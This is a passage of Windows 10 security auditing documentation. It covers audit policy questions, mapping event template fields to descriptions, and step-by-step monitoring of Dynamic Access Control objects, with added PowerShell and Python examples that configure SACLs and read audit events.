folder SACL and the global object access auditing policy. This means that an audit event is generated if an activity
matches either the file or folder SACL or the global object access auditing policy.

How do I figure out why someone was able to access a resource?
Often it is not enough to know simply that an object such as a file or folder was accessed. You may also want to
know why the user was able to access this resource. You can obtain this forensic data by configuring the Audit
Handle Manipulation setting with the Audit File System or with the Audit Registry audit setting.

How do I know when changes are made to access control settings, by whom, and what the changes were?
To track access control changes on computers running Windows Server 2016, Windows Server 2012 R2, Windows
Server 2012, Windows 7, Windows Server 2008 R2, Windows Vista, or Windows Server 2008, you need to enable
the following settings, which track changes to DACLs:
Audit File System subcategory: Enable for success, failure, or success and failure
Audit Authorization Policy Change setting: Enable for success, failure, or success and failure
A SACL with Write and Take ownership permissions: Apply to the object that you want to monitor
In Windows XP and Windows Server 2003, you need to use the Audit policy change subcategory.
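The three settings above, the registry SACL discussed under Object Access\Audit Registry, and the global object access auditing policy described a few answers earlier are all configured in the same way: an audit entry on the object (or a global one), plus the subcategory that turns the entry into events. The following script is an added example, not code from the original document or from Microsoft, that does both for a folder and for a registry key and then defines a global SACL with auditpol.exe. The paths, the principal Everyone, and the audited rights are assumptions; in particular ChangePermissions (WRITE_DAC) is added alongside the Write and Take ownership rights the text names, because a DACL edit exercises that right. All of it needs an elevated prompt.

```powershell
# Added example, not part of the original document: put an audit entry (SACL)
# on a folder and on a registry key, enable the subcategories that generate
# events for them, and define a global object access SACL. Paths, the
# principal 'Everyone' and the chosen rights are assumptions for this example.

function Add-FileAuditRule {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Identity = 'Everyone',
        # Write and TakeOwnership are the rights the text names; ChangePermissions
        # (WRITE_DAC) is the right a DACL change actually exercises.
        [System.Security.AccessControl.FileSystemRights]$Rights = 'Write, ChangePermissions, TakeOwnership',
        [System.Security.AccessControl.AuditFlags]$Audit = 'Success, Failure'
    )
    # -Audit makes Get-Acl return the SACL as well as the DACL (needs SeSecurityPrivilege).
    $acl  = Get-Acl -Path $Path -Audit
    $rule = [System.Security.AccessControl.FileSystemAuditRule]::new(
        $Identity, $Rights,
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        $Audit)
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
    # Return the audit entries now on the object so the caller can verify them.
    (Get-Acl -Path $Path -Audit).GetAuditRules($true, $true, [System.Security.Principal.NTAccount])
}

function Add-RegistryAuditRule {
    param(
        [Parameter(Mandatory)][string]$Path,   # a PowerShell registry path, e.g. HKLM:\...
        [string]$Identity = 'Everyone',
        # Rights that change a key: values, subkeys, deletion, and its own security.
        [System.Security.AccessControl.RegistryRights]$Rights = 'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership',
        [System.Security.AccessControl.AuditFlags]$Audit = 'Success, Failure'
    )
    $acl  = Get-Acl -Path $Path -Audit
    $rule = [System.Security.AccessControl.RegistryAuditRule]::new(
        $Identity, $Rights,
        [System.Security.AccessControl.InheritanceFlags]::ContainerInherit,
        [System.Security.AccessControl.PropagationFlags]::None,
        $Audit)
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
    (Get-Acl -Path $Path -Audit).GetAuditRules($true, $true, [System.Security.Principal.NTAccount])
}

function Enable-ObjectAuditSubcategory {
    # A SACL alone produces nothing; the matching subcategories must be on.
    foreach ($sub in 'File System', 'Registry', 'Authorization Policy Change') {
        & auditpol.exe /set "/subcategory:$sub" /success:enable /failure:enable | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "auditpol could not enable '$sub'" }
    }
}

function Set-GlobalObjectAccessAudit {
    param(
        [ValidateSet('File', 'Key')][string]$Type = 'File',
        [string]$Identity = 'Everyone',
        [string]$Access = 'FW'   # auditpol access-mask shorthand: FW = generic write
    )
    # auditpol /resourceSACL defines the global object access auditing policy;
    # the effective SACL on each object is the union of this and its own SACL.
    & auditpol.exe /resourceSACL /set "/type:$Type" "/user:$Identity" /success /failure "/access:$Access"
    if ($LASTEXITCODE -ne 0) { throw 'auditpol /resourceSACL failed' }
    & auditpol.exe /resourceSACL /view "/type:$Type"
}

# Example invocation with placeholder paths (adjust for your environment).
Enable-ObjectAuditSubcategory
Add-FileAuditRule     -Path 'D:\Shares\PayrollData'      # placeholder folder
Add-RegistryAuditRule -Path 'HKLM:\SOFTWARE\ExampleApp'  # placeholder key
Set-GlobalObjectAccessAudit -Type Key -Access FW         # every registry key, writes only
```

The per-object functions return the audit rules read back from the object after Set-Acl, which is the check worth keeping: a Set-Acl that silently drops the SACL (typically because the caller lacks SeSecurityPrivilege) is otherwise invisible until the expected events never arrive.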

How can I roll back security audit policies from the advanced audit policy to the basic audit policy?
Applying advanced audit policy settings replaces any comparable basic security audit policy settings. If you
subsequently change the advanced audit policy setting to Not configured, you need to complete the following
steps to restore the original basic security audit policy settings:
1. Set all Advanced Audit Policy subcategories to Not configured.
2. Delete all audit.csv files from the %SYSVOL% folder on the domain controller.
3. Reconfigure and apply the basic audit policy settings.
Unless you complete all of these steps, the basic audit policy settings will not be restored.

How can I monitor if changes are made to audit policy settings?
Changes to security audit policies are critical security events. You can use the Audit Audit Policy Change setting
to determine if the operating system generates audit events when the following types of activities take place:
Permissions and audit settings on the audit policy object are changed
The system audit policy is changed
Security event sources are registered or unregistered
Per-user audit settings are changed
The value of CrashOnAuditFail is modified
Audit settings on a file or registry key are changed
A Special Groups list is changed
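Each activity in that list produces an event in the Security log, and because an attacker with sufficient rights will often reduce auditing before doing anything else (as the Policy Change\Audit Audit Policy Change description above notes), these events deserve their own review. The script below is an added example, not code from the original document or from Microsoft: it pulls those events for a time window and maps each to the activity it represents. The event IDs are the standard Windows Security log IDs for these activities; the mapping to the list above is my own, and the 24-hour window and the field names read from the event XML are assumptions (fields absent from an event simply come back empty).

```powershell
# Added example, not part of the original document: collect the events that
# the Audit Audit Policy Change subcategory generates and label each with the
# activity from the list above. Event IDs are the standard Security log IDs;
# the 24-hour window is an assumption for this example.

# Event ID -> activity. The mapping onto the text's list is my own.
$AuditPolicyChangeEvents = @{
    4719 = 'System audit policy was changed'
    4902 = 'Per-user audit policy table was created'
    4904 = 'Security event source was registered'
    4905 = 'Security event source was unregistered'
    4906 = 'CrashOnAuditFail value was changed'
    4907 = 'Audit settings on an object (file or registry key) were changed'
    4908 = 'Special Groups logon table was modified'
    4912 = 'Per-user audit policy was changed'
}

function Get-AuditPolicyChangeEvent {
    param(
        [int]$Hours = 24,
        [string]$ComputerName = $env:COMPUTERNAME
    )
    $filter = @{
        LogName   = 'Security'
        Id        = [int[]]$AuditPolicyChangeEvents.Keys
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # Get-WinEvent reports an error when nothing matches; treat that as "no events".
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull the EventData fields out of the event XML. SubjectUserName and
            # SubjectDomainName identify who made the change; the other fields
            # vary by event and are left empty when absent (assumption).
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            $who = if ($data['SubjectUserName']) {
                "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            } else { '' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Id          = $_.Id
                Activity    = $AuditPolicyChangeEvents[[int]$_.Id]
                Subject     = $who
                # For 4719 the rendered message names the subcategory and the
                # new setting; the first line is enough for a review list.
                Summary     = ($_.Message -split "`r?`n")[0]
            }
        }
}

Get-AuditPolicyChangeEvent | Sort-Object Time | Format-Table -AutoSize
```

Run against a central collector or with -ComputerName per host, this is the review that closes the loop on the planning advice earlier in the document: a 4719 that disables a subcategory you deliberately turned on, or a 4907 on an object you did not touch, is worth treating as an incident rather than noise.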

How can I minimize the number of events that are generated?
Finding the right balance between auditing enough network and computer activity and auditing too little network
and computer activity can be challenging. You can achieve this balance by identifying the most important
resources, critical activities, and users or groups of users. Then design a security audit policy that targets these
resources, activities, and users. Useful guidelines and recommendations for developing an effective security
auditing strategy can be found in Planning and deploying advanced security audit policies.

What are the best tools to model and manage audit policies?
The integration of advanced audit policy settings with domain Group Policy, introduced in Windows 7 and
Windows Server 2008 R2, is designed to simplify the management and implementation of security audit policies
in an organization's network. As such, tools used to plan and deploy Group Policy Objects for a domain can also be
used to plan and deploy security audit policies. On an individual computer, the Auditpol command-line tool can be
used to complete a number of important audit policy–related management tasks.
In addition, there are a number of computer management products, such as the Audit Collection Services in the
Microsoft System Center Operations Manager products, which can be used to collect and filter event data.

Where can I find information about all the possible events that I might receive?
Users who examine the security event log for the first time can be a bit overwhelmed by the number of audit
events that are stored there (which can quickly number in the thousands) and by the structured information that is
included for each audit event. Additional information about these events, and the settings used to generate them,
can be obtained from the following resources:
Windows 8 and Windows Server 2012 Security Event Details
Security Audit Events for Windows 7 and Windows Server 2008 R2
Security Audit Events for Windows Server 2008 and Windows Vista
Advanced security audit policy settings

Where can I find more detailed information?


To learn more about security audit policies, see the following resources:
Planning and deploying advanced security audit policies
Security Monitoring and Attack Detection Planning Guide
Security Audit Events for Windows 7 and Windows Server 2008 R2
Security Audit Events for Windows Server 2008 and Windows Vista
Which editions of Windows support advanced audit policy configuration
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Advanced audit policy configuration is supported on all versions of Windows since it was introduced in Windows
Vista. There is no difference in security auditing support between 32-bit and 64-bit versions. Windows editions
that cannot join a domain, such as Windows 10 Home edition, do not have access to these features.
How to get a list of XML data name elements in EventData
4/5/2019 • 2 minutes to read

Applies to
Windows 10
The Security log uses a manifest where you can get all of the event schema.
Run the following from an elevated PowerShell prompt:

$secEvents = get-winevent -listprovider "microsoft-windows-security-auditing"

The .events property is a collection of all of the events listed in the manifest on the local machine.
For each event, there is a .Template property for the XML template used for the event properties (if there are any).
For example:
PS C:\WINDOWS\system32> $SecEvents.events[100]

Id : 4734
Version : 0
LogLink : System.Diagnostics.Eventing.Reader.EventLogLink
Level : System.Diagnostics.Eventing.Reader.EventLevel
Opcode : System.Diagnostics.Eventing.Reader.EventOpcode
Task : System.Diagnostics.Eventing.Reader.EventTask
Keywords : {}
Template : <template xmlns="http://schemas.microsoft.com/win/2004/08/events">
<data name="TargetUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectLogonId" inType="win:HexInt64" outType="win:HexInt64"/>
<data name="PrivilegeList" inType="win:UnicodeString" outType="xs:string"/>
</template>

Description : A security-enabled local group was deleted.

Subject:
Security ID: %4
Account Name: %5
Account Domain: %6
Logon ID: %7

Group:
Security ID: %3
Group Name: %1
Group Domain: %2

Additional Information:
Privileges: %8

PS C:\WINDOWS\system32> $SecEvents.events[100].Template
<template xmlns="http://schemas.microsoft.com/win/2004/08/events">
<data name="TargetUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectLogonId" inType="win:HexInt64" outType="win:HexInt64"/>
<data name="PrivilegeList" inType="win:UnicodeString" outType="xs:string"/>
</template>

Mapping data name elements to the names in an event description


You can use the <Template> and <Description> to map the data name elements that appear in XML view to the
names that appear in the event description.
The <Description> is just the format string (if you’re used to Console.WriteLine or sprintf statements), and the
<Template> is the source of the input parameters for the <Description>.
Using Security event 4734 as an example:
Template : <template xmlns="http://schemas.microsoft.com/win/2004/08/events">
<data name="TargetUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectLogonId" inType="win:HexInt64" outType="win:HexInt64"/>
<data name="PrivilegeList" inType="win:UnicodeString" outType="xs:string"/>
</template>

Description : A security-enabled local group was deleted.

Subject:
Security ID: %4
Account Name: %5
Account Domain: %6
Logon ID: %7

Group:
Security ID: %3
Group Name: %1
Group Domain: %2

Additional Information:
Privileges: %8

For the Subject: Security Id: text element, it will use the fourth element in the Template, SubjectUserSid.
For Additional Information Privileges:, it would use the eighth element PrivilegeList.
A caveat to this is an oft-overlooked property of events called Version (in the <System> element) that indicates
the revision of the event schema and description. Most events have a single version (Version = 0, as in the
Security/4734 example), but a few events such as Security/4624 or Security/4688 have at least three versions (0,
1, and 2), depending on the OS version where the event is generated. Only the latest version is used for generating
events in the Security log. In any case, the Template and the Description must be taken from the same Event
Version, because the %N placeholders are positional and a different version may add or reorder data elements.
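The mapping described above, as an added example that is not part of the original article: the Template XML and Description string are the Security/4734 values shown earlier, embedded here as constructed inputs so the script runs offline; the function names are my own. A placeholder with no matching data element is reported as an error, which is the symptom of mixing Template and Description from different Event Versions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed inputs, copied from the Security/4734 Template and Description above.
TEMPLATE_4734 = """<template xmlns="http://schemas.microsoft.com/win/2004/08/events">
<data name="TargetUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectLogonId" inType="win:HexInt64" outType="win:HexInt64"/>
<data name="PrivilegeList" inType="win:UnicodeString" outType="xs:string"/>
</template>"""

DESCRIPTION_4734 = """A security-enabled local group was deleted.

Subject:
Security ID: %4
Account Name: %5
Account Domain: %6
Logon ID: %7

Group:
Security ID: %3
Group Name: %1
Group Domain: %2

Additional Information:
Privileges: %8"""

# The manifest namespace used by the <template> element.
EVENTS_NS = "{http://schemas.microsoft.com/win/2004/08/events}"
# Description placeholders are %1, %2, ... and are 1-based positions in the Template.
PLACEHOLDER = re.compile(r"%(\d+)")


def template_data_names(template_xml):
    """Return the <data name="..."> values in Template order (index 0 is %1)."""
    root = ET.fromstring(template_xml)
    return [d.get("name") for d in root.iter(EVENTS_NS + "data")]


def map_placeholders(template_xml, description):
    """Map every %N placeholder in the Description to its EventData name.

    Raises ValueError when a placeholder has no matching <data> element,
    which is what happens when the Template and Description were taken
    from different Event Versions.
    """
    names = template_data_names(template_xml)
    mapping = {}
    for num in PLACEHOLDER.findall(description):
        idx = int(num)
        if idx < 1 or idx > len(names):
            raise ValueError(
                f"%{idx} has no <data> element; the Template defines only "
                f"{len(names)} (Template/Description version mismatch?)"
            )
        mapping[f"%{idx}"] = names[idx - 1]
    return mapping


def render_description(template_xml, description):
    """Rewrite the Description with each %N replaced by {DataName}."""
    mapping = map_placeholders(template_xml, description)
    return PLACEHOLDER.sub(lambda m: "{" + mapping["%" + m.group(1)] + "}", description)


if __name__ == "__main__":
    pairs = map_placeholders(TEMPLATE_4734, DESCRIPTION_4734).items()
    for ph, name in sorted(pairs, key=lambda kv: int(kv[0][1:])):
        print(f"{ph:>3} -> {name}")
    print()
    print(render_description(TEMPLATE_4734, DESCRIPTION_4734))
```

On a live system the same two functions can be fed the `.Template` and `.Description` strings that `Get-WinEvent -ListProvider` returns for any Security event.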
Using advanced security auditing options to monitor dynamic access control objects
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This guide explains the process of setting up advanced security auditing capabilities that are made possible
through settings and events that were introduced in Windows 8 and Windows Server 2012.
These procedures can be deployed with the advanced security auditing capabilities described in Deploy Security
Auditing with Central Audit Policies (Demonstration Steps).

In this guide
Domain administrators can create and deploy expression-based security audit policies by using file classification
information (resource attributes), user claims, and device claims to target specific users and resources to monitor
potentially significant activities on one or more computers. These policies can be deployed centrally by using
Group Policy, or directly on a computer, in a folder, or in individual files.

In this section

Topic: Monitor the central access policies that apply on a file server
    This topic for the IT professional describes how to monitor changes to the central access policies that apply
    to a file server when using advanced security auditing options to monitor dynamic access control objects.
    Central access policies are created on a domain controller and then applied to file servers through Group
    Policy management.

Topic: Monitor the use of removable storage devices
    This topic for the IT professional describes how to monitor attempts to use removable storage devices to
    access network resources. It describes how to use advanced security auditing options to monitor dynamic
    access control objects.

Topic: Monitor resource attribute definitions
    This topic for the IT professional describes how to monitor changes to resource attribute definitions when
    you are using advanced security auditing options to monitor dynamic access control objects.

Topic: Monitor central access policy and rule definitions
    This topic for the IT professional describes how to monitor changes to central access policy and central
    access rule definitions when you use advanced security auditing options to monitor dynamic access control
    objects.

Topic: Monitor user and device claims during sign-in
    This topic for the IT professional describes how to monitor user and device claims that are associated with
    a user’s security token when you are using advanced security auditing options to monitor dynamic access
    control objects.

Topic: Monitor the resource attributes on files and folders
    This topic for the IT professional describes how to monitor attempts to change settings to the resource
    attributes on files when you are using advanced security auditing options to monitor dynamic access control
    objects.

Topic: Monitor the central access policies associated with files and folders
    This topic for the IT professional describes how to monitor changes to the central access policies that are
    associated with files and folders when you are using advanced security auditing options to monitor dynamic
    access control objects.

Topic: Monitor claim types
    This topic for the IT professional describes how to monitor changes to claim types that are associated with
    dynamic access control when you are using advanced security auditing options.

Important: This procedure can be configured on computers running any of the supported Windows
operating systems. The other monitoring procedures can be configured only as part of a functioning dynamic
access control deployment.

Related topics
Security auditing
Monitor the central access policies that apply on a file server
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to the central access policies that apply to a file
server when using advanced security auditing options to monitor dynamic access control objects. Central access
policies are created on a domain controller and then applied to file servers through Group Policy management.
Use the following procedures to configure and verify security auditing settings that are used to monitor changes to
the set of central access policies on a file server. The following procedures assume that you have configured and
deployed dynamic access control, including central access policies, and claims in your network. If you have not yet
deployed dynamic access control in your network, see Deploy a Central Access Policy (Demonstration Steps).
To configure settings to monitor changes to central access policies
1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the flexible access Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit
Policy Configuration, double-click Policy Change, and then double-click Other Policy Change Events.

Note: This policy setting monitors policy changes that might not be captured otherwise, such as central
access policy changes or trusted platform module configuration changes.

5. Select the Configure the following audit events check box, select the Success check box (and the
Failure check box, if desired), and then click OK.
After you modify the central access policies on the domain controller, verify that the changes have been applied to
the file server and that the proper events are logged.
To verify changes to the central access policies
1. Sign in to your domain controller by using domain administrator credentials.
2. Open the Group Policy Management Console.
3. Right-click Default domain policy, and then click Edit.
4. Double-click Computer Configuration, double-click Policies, and then double-click Windows Settings.
5. Double-click Security Settings, right-click File system, and then click Manage CAPs.
6. In the wizard that appears, follow the instructions to add a new central access policy (CAP), and then click OK.
7. Use local administrator credentials to sign in to the server that hosts resources that are subject to the central
access policies you changed.
8. Press the Windows key + R, then type cmd to open a Command Prompt window.

Note: If the User Account Control dialog box appears, confirm that the action it displays is what you
want, and then click Yes.

9. Type gpupdate /force, and press ENTER.


10. In Server Manager, click Tools, and then click Event Viewer.
11. Expand Windows Logs, and then click Security. Verify that event 4819 appears in the security log.

Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor the use of removable storage devices
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor attempts to use removable storage devices to access
network resources. It describes how to use advanced security auditing options to monitor dynamic access control
objects.
If you configure this policy setting, an audit event is generated each time a user attempts to copy, move, or save a
resource to a removable storage device.
Use the following procedures to monitor the use of removable storage devices and to verify that the devices are
being monitored.

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To configure settings to monitor removable storage devices


1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the flexible access Group Policy Object on the domain controller, and then click
Edit.
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit Policy
Configuration, double-click Object Access, and then double-click Audit Removable Storage.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
6. If you selected the Failure check box, double-click Audit Handle Manipulation, select the Configure the
following audit events check box, and then select Failure.
7. Click OK, and then close the Group Policy Management Editor.
After you configure the settings to monitor removable storage devices, use the following procedure to verify that
the settings are active.
To verify that removable storage devices are monitored
1. Sign in to the computer that hosts the resources that you want to monitor. Press the Windows key + R, and
then type cmd to open a Command Prompt window.

Note: If the User Account Control dialog box appears, confirm that the action it displays is what you
want, and then click Yes.

2. Type gpupdate /force, and press ENTER.


3. Connect a removable storage device to the targeted computer and attempt to copy a file that is protected with
the Removable Storage Audit policy.
4. In Server Manager, click Tools, and then click Event Viewer.
5. Expand Windows Logs, and then click Security.
6. Look for event 4663, which logs successful attempts to write to or read from a removable storage device.
Failures will log event 4656. Both events include Task Category = Removable Storage device.
Key information to look for includes the name and account domain of the user who attempted to access the
file, the object that the user is attempting to access, resource attributes of the resource, and the type of
access that was attempted.

Note: We do not recommend that you enable this category on a file server that hosts file shares on a
removable storage device. When Removable Storage Auditing is configured, any attempt to access the
removable storage device will generate an audit event.

Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor resource attribute definitions
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to resource attribute definitions when you are
using advanced security auditing options to monitor dynamic access control objects. Resource attribute definitions
define the basic properties of resource attributes, such as what it means for a resource to be defined as “high
business value.” Resource attribute definitions are stored in AD DS under the Resource Properties container.
Changes to these definitions could significantly change the protections that govern a resource, even if the resource
attributes that apply to the resource remain unchanged. Changes can be monitored like any other AD DS object.
For information about monitoring changes to the resource attributes that apply to files, see Monitor the resource
attributes on files and folders.
Use the following procedures to configure settings to monitor changes to resource attribute definitions in AD DS
and to verify the changes. These procedures assume that you have configured and deployed Dynamic Access
Control, including central access policies, claims, and other components, in your network. If you have not yet
deployed Dynamic Access Control in your network, see Deploy a Central Access Policy (Demonstration Steps).

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To configure settings to monitor changes to resource attributes


1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the Group Policy Object for the default domain controller, and then click Edit.
4. Double-click Computer Configuration, click Security Settings, expand Advanced Audit Policy
Configuration, expand System Audit Policies, click DS Access, and then double-click Audit directory
service changes.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
6. Close the Group Policy Management Editor.
7. Open the Active Directory Administrative Center.
8. Under Dynamic Access Control, right-click Resource Properties, and then click Properties.
9. Click the Security tab, click Advanced to open the Advanced Security Settings dialog box, and then click the
Auditing tab.
10. Click Add, add a security auditing setting for the container, and then close all Security properties dialog boxes.
After you configure settings to monitor changes to resource attributes in AD DS, verify that the changes are being
monitored.
To verify that changes to resource definitions are monitored
1. Sign in to your domain controller by using domain administrator credentials.
2. Open the Active Directory Administrative Center.
3. Under Dynamic Access Control, click Resource Properties, and then double-click a resource attribute.
4. Make changes to this resource attribute.
5. Click OK, and then close the Active Directory Administrative Center.
6. In Server Manager, click Tools, and then click Event Viewer.
7. Expand Windows Logs, and then click Security. Verify that event 5137 appears in the security log.
Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor central access policy and rule definitions
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to central access policy and central access rule
definitions when you use advanced security auditing options to monitor dynamic access control objects. Central
access policies and rules determine access permissions for multiple files on multiple file servers. Therefore, it is
important to monitor changes to them. Like user claim and device claim definitions, central access policy and rule
definitions reside in Active Directory Domain Services (AD DS), and they can be monitored just like any other
object in Active Directory. Central access policies and rules are critical elements in a Dynamic Access Control
deployment. These policies and rules are stored in AD DS, so they should be less likely to be tampered with than
other network objects. However, it is important to monitor these objects for potential changes in security auditing
and to verify that policies are being enforced.
Use the following procedures to configure settings to monitor changes to central access policy and central access
rule definitions and to verify the changes. These procedures assume that you have configured and deployed
Dynamic Access Control, including central access policies, claims, and other components, in your network. If you
have not yet deployed Dynamic Access Control in your network, see Deploy a Central Access Policy
(Demonstration Steps).

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To configure settings to monitor changes to central access policy and rule definitions
1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the default domain controller Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, click Security Settings, expand Advanced Audit Policy
Configuration, expand System Audit Policies, click DS Access, and then double-click Audit directory
service changes.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
6. Close the Group Policy Management Editor.
7. Open the Active Directory Administrative Center.
8. Under Dynamic Access Control, right-click Central Access Policies, and then select Properties.
9. Click the Security tab, click Advanced to open the Advanced Security Settings dialog box, and then click the
Auditing tab.
10. Click Add, add a security auditing setting for the container, and then close all Security properties dialog boxes.
After you configure settings to monitor changes to central access policy and central access rule definitions, verify
that the changes are being monitored.
To verify that changes to central access policy and rule definitions are monitored
1. Sign in to your domain controller by using domain administrator credentials.
2. Open the Active Directory Administrative Center.
3. Under Dynamic Access Control, right-click Central Access Policies, and then click Properties.
4. Click the Security tab, click Advanced to open the Advanced Security Settings dialog box, and then click the
Auditing tab.
5. Click Add, add a security auditing setting for the container, and then close all Security properties dialog boxes.
6. In the Central Access Policies container, add a new central access policy (or select one that exists), click
Properties in the Tasks pane, and then change one or more attributes.
7. Click OK, and then close the Active Directory Administrative Center.
8. In Server Manager, click Tools, and then click Event Viewer.
9. Expand Windows Logs, and then click Security. Verify that event 4819 appears in the security log.
Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor user and device claims during sign-in
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor user and device claims that are associated with a user’s
security token when you are using advanced security auditing options to monitor dynamic access control objects.
Device claims are associated with the system that is used to access resources that are protected with Dynamic
Access Control. User claims are attributes that are associated with a user. User claims and device claims are
included in the user’s security token used at sign-on. For example, information about Department, Company,
Project, or Security clearances might be included in the token.
Use the following procedures to monitor changes to user claims and device claims in the user’s sign-on token and
to verify the changes. These procedures assume that you have configured and deployed Dynamic Access Control,
including central access policies, claims, and other components, in your network. If you have not yet deployed
Dynamic Access Control in your network, see Deploy a Central Access Policy (Demonstration Steps).

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To monitor user and device claims in user logon token


1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the flexible access Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, click Security Settings, expand Advanced Audit Policy
Configuration, expand System Audit Policies, click Logon/Logoff, and then double-click Audit
User/Device claims.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
6. Close the Group Policy Management Editor.
After you configure settings to monitor user and device claims, verify that the changes are being monitored.
To verify that user and device claims in user logon token are monitored
1. With local administrator credentials, sign in to a file server that is subject to the flexible access Group Policy
Object.
2. Open an elevated command prompt, and run the following command:
gpupdate /force

3. From a client computer, connect to a file share on the file server as a user who has access permissions to the
file server.
4. On the file server, open Event Viewer, expand Windows Logs, and select the Security log. Look for event
4626, and confirm that it contains information about user claims and device claims.
Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor the resource attributes on files and folders
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor attempts to change settings to the resource attributes
on files when you are using advanced security auditing options to monitor dynamic access control objects.
If your organization has a carefully thought out authorization configuration for resources, changes to these
resource attributes can create potential security risks. Examples include:
Changing files that have been marked as high business value to low business value.
Changing the Retention attribute of files that have been marked for retention.
Changing the Department attribute of files that are marked as belonging to a particular department.
Use the following procedures to configure settings to monitor changes to resource attributes on files and folders.
These procedures assume that you have configured and deployed central access policies in your network. For more
information about how to configure and deploy central access policies, see Dynamic Access Control: Scenario
Overview.

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To monitor changes to resource attributes on files


1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the flexible access Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit
Policy Configuration, double-click Policy Change, and then double-click Audit Authorization Policy
Change.
5. Select the Configure the following audit events check box, select the Success and Failure check boxes, and
then click OK.
After you configure settings to monitor resource attributes on files, verify that the changes are being monitored.
To verify that changes to resource attributes on files are monitored
1. Use administrator credentials to sign in to the server that hosts the resource you want to monitor.
2. From an elevated command prompt, type gpupdate /force, and then press ENTER.
3. Attempt to change resource properties on one or more files and folders.
4. In Server Manager, click Tools, and then click Event Viewer.
5. Expand Windows Logs, and then click Security.
6. Depending on which resource attributes you attempted to change, you should look for the following events:
Event 4911, which tracks changes to file attributes
Event 4913, which tracks changes to central access policies
Key information to look for includes the name and account domain of the principal attempting to change the
resource attribute, the object that the principal is attempting to modify, and information about the changes
that are being attempted.
Related resource
